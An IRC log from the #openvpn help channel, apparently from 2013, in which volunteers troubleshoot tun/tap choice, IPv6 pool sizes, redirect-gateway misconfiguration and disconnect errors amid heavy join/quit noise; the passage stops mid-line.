-!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn 11:29 < Freeaqingme> Is there any obvious reason ifconfig-ipv6-pool only supports /64 pools ? 11:33 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn 11:41 -!- nucl3ar [~atom@c-69-247-138-234.hsd1.tn.comcast.net] has joined #openvpn 11:42 < nucl3ar> !welcome 11:42 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 11:42 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 11:45 < nucl3ar> anybody familiar of issues concerning openvpn killing bandwidth *after* it's shutdown? 11:48 < nucl3ar> example: (#1) speed test using wget avg roughly 2.5-3 mb/s without openvpn (#2) connect through openvpn use wget again, roughly 1.0 mb/s (#3) kill openvpn (ctrl+c) run wget speedtest for last time.. this time 70 kb/s (dies intermittently). 11:50 -!- Martin` [martin@2001:16f8:2:10::215] has joined #openvpn 11:50 < Martin`> Hello world! 12:04 < Martin`> When I want to connect my ipad to openvpn, do I have to change my server config? my server is configed with tap devices (I bridged the devices). I see the ios client does not support tap. is this a problem? or can client be tun, and server tap? 12:04 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has quit [Remote host closed the connection] 12:07 < dioz> interesting 12:08 < dioz> there is ios support now 12:09 < dioz> check the apple store 12:09 < dioz> !ios 12:09 < dioz> !apple 12:09 < dioz> lemme scroll back a second 12:09 < Martin`> I know, downloaded the app,but I read there is no tap support in ios 12:09 -!- MeanderingCode_ [~Meanderin@71-213-175-129.albq.qwest.net] has quit [Remote host closed the connection] 12:10 < dioz> oooh i see what you're saying 12:13 -!- blackmagic [~black@ip98-185-21-138.rn.hr.cox.net] has quit [Ping timeout: 245 seconds] 12:27 -!- blackmagic [~black@ip98-185-21-138.rn.hr.cox.net] has joined #openvpn 12:35 -!- hazardous [~dbn@openvpn/user/hazardous] has quit [Read error: Connection reset by peer] 12:42 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 12:44 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 12:47 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 12:51 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 12:52 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 12:53 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 12:53 -!- _br_- is now known as _br_ 12:58 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 13:01 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 13:03 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 13:05 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 13:08 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 13:11 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 13:13 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 13:14 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 13:18 -!- Valcorb [~Valcorb@74.115.1.243] has joined #openvpn 13:19 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 13:20 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 13:24 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 13:28 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 13:29 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 13:31 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 13:35 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 13:38 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 13:40 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 13:41 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 13:45 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 13:47 -!- Valcorb [~Valcorb@74.115.1.243] has quit [Ping timeout: 246 seconds] 13:47 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 13:50 -!- p47 [~Marcos1@189.144.65.247] has joined #openvpn 13:50 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 13:50 < p47> When I connect to the vpn I can acces to my server but My computer just get disconnect to internet. any idea? 13:54 -!- Castor_ [Castor_@CPE-72-133-200-232.wi.res.rr.com] has quit [Read error: Connection reset by peer] 13:55 -!- Castor__ [~hi@CPE-72-133-200-232.wi.res.rr.com] has joined #openvpn 13:55 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 13:56 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 13:58 -!- Castor__ [~hi@CPE-72-133-200-232.wi.res.rr.com] has quit [Read error: Connection reset by peer] 13:58 -!- Castor_ [~hi@CPE-72-133-200-232.wi.res.rr.com] has joined #openvpn 13:58 -!- p47 [~Marcos1@189.144.65.247] has quit [Quit: Saliendo] 13:59 -!- p47 [~Marcos1@189.144.65.247] has joined #openvpn 14:00 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 14:01 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 14:01 -!- scyld [~scyld@unaffiliated/wasyl] has quit [Quit: Wychodzi] 14:03 -!- p47 [~Marcos1@189.144.65.247] has quit [Client Quit] 14:03 -!- p47 [~Marcos1@189.144.65.247] has joined #openvpn 14:03 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 14:06 -!- emmanuelux [~emmanuelu@vpn7.freedom-ip.com] has quit [Ping timeout: 248 seconds] 14:06 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 14:09 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 14:10 -!- Porkepix [~Porkepix@lns-bzn-20-82-64-31-107.adsl.proxad.net] has quit [Ping timeout: 252 seconds] 14:11 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 14:12 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 14:13 -!- Porkepix [~Porkepix@lns-bzn-45-82-65-137-188.adsl.proxad.net] has joined #openvpn 14:15 -!- Qianyi [~Qianyi@180.155.14.35] has quit [Read error: Connection reset by peer] 14:16 -!- nutron [~nutron@unaffiliated/nutron] has quit [Quit: I must go eat my cheese!] 14:16 -!- Qianyi [~Qianyi@180.155.14.35] has joined #openvpn 14:17 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 14:19 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 14:22 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 14:22 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 14:23 -!- tjz [~tjz@unaffiliated/tjz] has quit [Ping timeout: 256 seconds] 14:25 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 14:27 -!- Castor_ [~hi@CPE-72-133-200-232.wi.res.rr.com] has quit [Read error: Connection reset by peer] 14:27 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 14:28 -!- Castor_ [Castor_@CPE-72-133-200-232.wi.res.rr.com] has joined #openvpn 14:30 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 14:32 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 14:32 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 14:34 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 14:38 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 14:39 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 14:41 < Martin`> p47: do you want to have internet via vpn? 14:42 <+pekster> Sounds to me like a case of redirect-gateway being pushed but not functioning (maybe the server doesn't forward the traffic properly?) 14:43 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 14:44 < p47> Martin`, solved 14:44 < p47> thank you 14:45 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 14:47 < Martin`> your welcome 14:47 < Martin`> now I'm going to solve my problems 14:47 < Martin`> want to connect a ios device. but need a tun instead of tap for that 14:47 < p47> Martin`, LOL 14:47 <+pekster> Why use tap in the first place? 14:47 < Martin`> gues routing is the only way :( 14:47 <+pekster> !tunortap 14:47 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 14:47 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! 14:48 < p47> Martin`, I would like to help you but I can not I'm a noob 14:48 < Martin`> hmm 14:48 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 14:48 < EugeneKay> Martin`, you can use a tap device in routed mode just fine. 14:49 < Martin`> pekster: I run the vpn on different ports. over http proxy needed on port 442 14:49 < Martin`> 443 14:49 < Martin`> so I bridge multible vpn's 14:49 < Martin`> port 443 with redirect gateway 14:49 <+pekster> Oh. I just use separate ranges and route them internally when I need to do that 14:50 <+pekster> eg: if you have 10.8.0.0/24 as your VPN range, give 1 VPN 10.8.0.0/25 and another 10.8.0.128/25, and connect them together in the server/firewall if you want clients to talk to each other 14:50 < Martin`> I believe you can not bridge a tun 14:50 <+pekster> I'm talking about routing them, not bridging them 14:50 <+pekster> Notice how I split the /24 into two /25's 14:50 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 14:50 < Martin`> ok 14:50 <+pekster> I mean, you can bridge 2 taps like you're doing too, but if the only reason is to "connect" both VPNs, I think it's a bad solution 14:51 < EugeneKay> Bridging bridges is not a sound structural decision 14:52 < Martin`> ok, but I'm not changing the setup right now, so I add one with tun I guess :P 14:52 <+pekster> YOu can always make the 2nd one a tun/routed configuration later when you can handle the downtime/setup-time 14:52 < Martin`> setup time is the big issue :P 14:53 <+pekster> As long as the server has ip-forwarding enabled and the firewall permits it, you can have as many VPNs communicating with other VPNs as you want 14:53 < Martin`> need to config multible things 14:53 < Martin`> the server has his own public ip so not a problem 14:53 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 14:54 <+pekster> With NAT/port-forwarding, it doesn't really matter. My home VPN server (currently running 3 VPNs, and soon to be a couple more) works fine behind my NAT box 14:55 < Martin`> :) 14:55 <+pekster> OpenVPN is very "NAT-friendly" since all traffic goes over a single port 14:55 < Martin`> thats why I like it :) 14:56 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 14:58 -!- p47 [~Marcos1@189.144.65.247] has quit [Quit: Saliendo] 14:59 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 15:02 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 15:04 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 15:05 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 15:08 < Martin`> pekster: but it is always better to get tun and routing? 15:08 <+pekster> Martin`: Unless you need tap (as the bot's output told you earlier) yes 15:09 <+pekster> If you're not doing weird stuff like multicast broadcasts or Ethernet broadcast protocols, you don't need tap for your setup 15:09 <+pekster> If you don't know what any of that is, you don't need tap 15:09 < Freeaqingme> or ipv6 with a subnet smaller than /112 15:09 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 15:09 -!- Castor_ [Castor_@CPE-72-133-200-232.wi.res.rr.com] has quit [Read error: Connection reset by peer] 15:09 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 15:09 <+pekster> Any ISP giving you less than a /64 needs to be shot 15:10 < Martin`> I can use a /48 15:10 < Freeaqingme> pekster, for a mere vps? 15:10 -!- Castor_ [Castor_@CPE-72-133-200-232.wi.res.rr.com] has joined #openvpn 15:10 < Martin`> that is next step I wanna do. add ipv6 support 15:10 < Martin`> not sure if my openvpn version does support it 15:10 <+pekster> Freeaqingme: Sure, why not. IPv6 space is huge. Maybe a customer has to officially "request" it, but there's no reason to fail to give customers at the very leat a /64 if they're paying for IPv6 access 15:10 < Freeaqingme> Martin`, 2.3.0 supports anything up to /112, although it's easiest with a /64 15:12 < Freeaqingme> pekster, true 15:12 < Martin`> OpenVPN 2.1.0 x86_64-pc-linux-gnu [SSL] [LZO2] [EPOLL] [PKCS11] [MH] [PF_INET6] [eurephia] built on Jul 20 2010 15:12 < Martin`> really need to upgrade 15:12 <+pekster> The recommendation for ISPs is to give residential customers at *least* a /64, and a /56 is suggested 15:13 < Martin`> I hope my home isp will give me a /64 15:13 <+pekster> If a hosting provider can't do that for a paying customer, I'd shop elsewhere 15:13 < Martin`> true, a /48 was not expensive for me 15:13 < Freeaqingme> pekster, I know. My default isp gives out 1 /48 per connection. But in case of a single machine (not a network, normally), a /112 is pretty big normally 15:14 <+pekster> Even a /56, that gives you 2^8, or 256 possible /64's. I can't imagine a home user needing more than that 15:14 < Martin`> I give every customer of me a /64 15:14 < Martin`> (vps) 15:14 < Martin`> and they can add ip's of the range to thier vpsses 15:14 <+pekster> Yea. That's 65536 /64's. Subtract a few-dozen for whatever backend stuff you need if you're large, and that's still a lot of customers you can support 15:15 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 15:15 <+pekster> If you have more customers than that, you need a larger allocation and can easily justify it to upstream 15:15 < Martin`> I'm only a littlebit sad that they configured ipv6 as a full /48 subnet 15:15 -!- b1rkh0ff [~b1rkh0ff@178.77.1.28] has quit [Quit: Leaving] 15:15 -!- Castor_ [Castor_@CPE-72-133-200-232.wi.res.rr.com] has quit [Ping timeout: 252 seconds] 15:16 -!- Castor_ [~hi@CPE-72-133-200-232.wi.res.rr.com] has joined #openvpn 15:16 < Freeaqingme> Martin`, but besides that. Ideally openvpn would support smaller subnets as well. What I found in commit messages, the only reason not to do so /yet/ is that with ipv6 currently only RA seems supported 15:16 <+pekster> A /112 isn't small enough? 15:17 < Freeaqingme> for 2 hosts, a /127 should be enough ;) 15:17 <+pekster> Well, IPv6 is *huge* 15:17 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 15:17 <+pekster> If you have even a "small" /64 as a residential customer, you can support this many /112 VPN: 72057594037927936 15:17 <+pekster> That's a number so large I don't even really understand how big it is 15:17 < Freeaqingme> pekster, I know 15:17 <+pekster> The age of /30's is over. use PtP if you want to do stuff like that 15:20 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 15:22 -!- Castor_ [~hi@CPE-72-133-200-232.wi.res.rr.com] has quit [Ping timeout: 244 seconds] 15:22 < Martin`> hmm strange, connection works great (on osx) but when I disconnect I get a lot errors 15:23 < Martin`> Sat Jan 19 21:30:16 2013 read UDPv4 [ECONNREFUSED]: Connection refused (code=111) 15:23 < Martin`> on server 15:23 <+pekster> That's normal, because the peer is returning 'ICMP port unreachable' 15:23 < Martin`> ok 15:23 <+pekster> Use 'explicit-exit-notify 2' or such on the client side if you don't like that 15:24 < Martin`> ah then he tells that he is leaving 15:24 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 245 seconds] 15:24 <+pekster> Yea. Withtout that, a peer has no indication the connection is "down" until a timeout occurs 15:24 <+pekster> (same as if the PC crashed or the Internet link went down) 15:25 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 15:25 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 15:27 < MorgyN> spunk smurf 15:28 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 15:30 < Martin`> SIGTERM[soft,remote-exit] received, client-instance exiting 15:30 < Martin`> much better 15:30 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 15:30 < Martin`> now try to use it on ios 15:30 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 15:33 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 15:36 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 15:36 < Martin`> days of work with some other vpn server to get it run on ios 15:36 < Martin`> now it just works easy with openvpn :D 15:36 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 15:40 < Martin`> now I can route some traffic via home so I can watch tv on my ipad :P 15:41 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 15:44 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye] 15:45 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 15:46 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 15:47 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 15:48 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 15:51 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 15:52 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 15:57 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 15:57 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 15:59 -!- Valcorb [Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn 16:02 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 16:02 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 16:03 < Qianyi> anyone have a mirror for openvpn 2.3rc2? 16:03 < Qianyi> cant visit offical download site 16:03 <+pekster> Qianyi: I can dump it on my personal webhost; do you really want 2.3rc2 and not 2.3.0 final? 16:03 <+rob0> I mentioned that earlier. 16:04 <+pekster> Yea, I noticed; I wasn't quite online then 16:04 < Qianyi> rob0, that is the version i would like to use, it is stable 16:04 <+pekster> Qianyi: By nature of a "release candidate" it is *LESS* stable than the final 2.3.0 release 16:04 < Qianyi> used it in the past but have new ssd without it 16:04 <+pekster> Qianyi: If you don't understand this, you probably want 2.3.0 16:05 <+pekster> (That said, there's hardly any difference beween 2.3rc2 and 2.3.0 anyway) 16:05 < Qianyi> i know rc stands for release candidate 16:05 < Qianyi> its just the version i would like to use 16:05 -!- JackWinter [~jack@vodsl-4655.vo.lu] has left #openvpn ["Konversation terminated!"] 16:06 * pekster shrugs. Whatever you want, really; I'm just making sure you really want it before I go through the trouble of mirroring it for you. What platform? (and if Windows, 32 vs 64 bit?) 16:06 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 16:06 < Qianyi> pekster, thanks! 16:07 < Qianyi> windows 7 64 16:07 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 16:07 -!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn 16:09 < Valcorb> hey guys, i have a question 16:09 < Valcorb> i have a Debian server 16:09 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 16:09 < Valcorb> with openvpn server installed 16:09 < Valcorb> i've configured it completly 16:09 < Valcorb> and im able to connect 16:09 < Valcorb> but i can't browse 16:09 < Valcorb> or anything 16:09 < Valcorb> just says 'not found' 16:09 < Valcorb> anyone knows where it could be? 16:10 <+pekster> Valcorb: If you're using "Access Server" that's not supported here. The open-ssource openvpn package has no "server" version 16:10 -!- ade_b [~Ade@redhat/adeb] has quit [Read error: Operation timed out] 16:10 <+pekster> !as 16:10 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 16:10 < Valcorb> nono 16:10 < Valcorb> Community 16:10 <+pekster> Are you using redirect-gateway? 16:10 <+pekster> Qianyi: http://pekster.sdf.org/misc/ovpn-2.3rc2/ 16:10 <@vpnHelper> Title: Index of /misc/ovpn-2.3rc2 (at pekster.sdf.org) 16:10 < Valcorb> hmm 16:10 < Valcorb> i think so 16:11 <+pekster> I've included the GPG sig too, just in case you don't trust me (if you're security-concious you should validate it even if you do trust me since it's not a secured link) 16:11 < Valcorb> i should be using it 16:12 < Valcorb> i'll check the cong 16:12 < Valcorb> *conf 16:12 <+pekster> Valcorb: Well, not if you don't want it. It sounds a bit to me like you're redirecting your default gateway with that parameter and can't access resources after you connect due to a misconfiguration 16:12 <+pekster> !redirect 16:12 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 16:12 <@vpnHelper> http://ircpimps.org/redirect.png 16:12 < Valcorb> hmm 16:12 < Valcorb> sec 16:12 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 16:13 < Valcorb> ah yes i am 16:13 < Valcorb> so I should just uncomment it? 16:13 < Valcorb> *comment 16:13 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 16:13 <+pekster> Do you want to be redirect all client Internet access through the VPN? 16:14 <+pekster> Don't use that directive unless you want what it does (that applies to all the directives, really) 16:14 < Valcorb> hmm 16:14 < Valcorb> i guess not 16:14 < Qianyi> pekster, much appreciate, got it 16:14 <+pekster> Qianyi: np 16:15 -!- Cpot-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 16:16 -!- Cpot-Oblivious is now known as Cpt-Oblivious 16:16 -!- nucl3ar [~atom@c-69-247-138-234.hsd1.tn.comcast.net] has quit [Quit: Leaving] 16:18 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 16:19 -!- dazo_afk [~dazo@openvpn/community/developer/dazo] has quit [Ping timeout: 245 seconds] 16:21 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 16:21 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 245 seconds] 16:22 -!- EugeneKay [eugene@itvends.com] has quit [Ping timeout: 245 seconds] 16:22 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Ping timeout: 245 seconds] 16:22 -!- bandroidx [~bandroidx@2607:f358:1:fed5:4:0:414:11] has quit [Ping timeout: 245 seconds] 16:22 -!- kenyon [kenyon@darwin.kenyonralph.com] has quit [Ping timeout: 245 seconds] 16:23 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 16:23 -!- EugeneKay [eugene@itvends.com] has joined #openvpn 16:23 -!- kenyon [kenyon@darwin.kenyonralph.com] has joined #openvpn 16:23 -!- peper [~peper@gentoo/developer/peper] has quit [Ping timeout: 276 seconds] 16:24 -!- peper [~peper@gentoo/developer/peper] has joined #openvpn 16:24 < Valcorb> pekster: i'll try later, having some vps issues 16:25 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn 16:25 -!- bandroidx [~bandroidx@2607:f358:1:fed5:4:0:414:11] has joined #openvpn 16:25 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 16:26 -!- ducblangis [~Ducblangi@24-117-207-111.cpe.cableone.net] has quit [Quit: WeeChat 0.3.0] 16:26 < Valcorb> thanks tho 16:28 -!- dxtr [~dxtr@unaffiliated/dxtr] has quit [Ping timeout: 276 seconds] 16:29 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 16:29 -!- Valcorb [Valcorb@94-226-106-113.access.telenet.be] has quit [Remote host closed the connection] 16:30 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 16:30 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 16:30 -!- dazo_afk [~dazo@openvpn/community/developer/dazo] has joined #openvpn 16:30 -!- mode/#openvpn [+o dazo_afk] by ChanServ 16:30 -!- dazo_afk is now known as dazo 16:33 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn 16:33 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 16:33 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn 16:36 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 16:39 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 16:41 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 16:44 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:44 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 16:48 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 16:49 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 16:52 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 16:52 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Client Quit] 16:53 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 16:54 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 16:57 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 16:58 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 17:00 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 17:03 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 17:04 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 17:05 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 17:09 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 17:10 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 17:12 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 17:14 -!- brute11k [~brute11k@89.249.230.101] has quit [Quit: Leaving.] 17:15 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 17:16 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 17:21 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 17:23 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 17:26 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 17:27 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye] 17:30 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 17:31 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 17:35 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 17:36 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 17:39 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 17:42 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 17:42 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 17:47 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 17:52 -!- _br_ 